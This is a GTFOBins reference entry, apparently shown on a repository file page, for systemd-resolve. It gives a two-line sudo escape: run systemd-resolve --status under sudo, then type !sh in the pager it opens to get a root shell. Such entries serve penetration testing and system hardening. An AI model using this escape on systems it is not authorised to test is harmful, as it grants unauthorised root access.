GTFOBins.github.io/_gtfobins/systemd-resolve.md

9 lines
218 B
Markdown
Raw Normal View History

2021-08-17 18:06:21 +02:00
---
functions:
sudo:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo systemd-resolve --status
!sh
---